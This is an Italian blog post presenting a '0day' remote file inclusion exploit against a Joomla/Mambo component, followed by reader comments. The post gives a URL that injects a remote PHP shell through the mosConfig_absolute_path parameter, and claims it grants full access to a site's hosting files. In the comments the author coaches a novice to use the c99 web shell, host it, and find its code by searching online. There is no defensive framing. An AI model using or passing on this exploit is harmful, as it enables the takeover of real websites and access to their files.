Home >> 0day Joomla: Shell Injection

0day Joomla: Shell Injection

martedì 16 marzo 2010 By 9 Comments

http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL}

XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path=

 

Permette di iniettare una shell in PHP nel sito web dandovi pieno accesso ai file dell'hosting.

Michele

Leggi anche:

Filed Under: Articoli Tagged With: , ,
  • http://nessuno.it marco

    Ma come funziona? cosa metto nella scritta shell? puoi fare un esempio?

  • http://www.michelepapaleo.it Michele

    Ciao Marco,

    alla scritta Shell devi inserire il link alla Shell (consiglio c99) e poi inviare il link nel tuo browser web.

    Spero di esser stato chiaro altrimenti chiedi ;)

  • http://www.nessuno.it marco

    frs ho kapito… mi dai il link dello shell?

  • http://www.michelepapaleo.it Michele

    La devi averla tu sul tuo hosting

  • http://www.nessuno.it marco

    e dove la skariko?

  • http://www.michelepapaleo.it Michele

    Su google ti basta cercare c99.txt e trovi il codice della shell da usare.

  • http://www.nessuno.it marco

    ho provato ma dà un errore… tipo You don’t have permission to access /mambots/content/josowbot.content.php on this server.

  • http://www.michelepapaleo.it Michele

    Vuol dire che è stato eseguito il fix per il bug

  • unsesà

    figo

Switch to our mobile site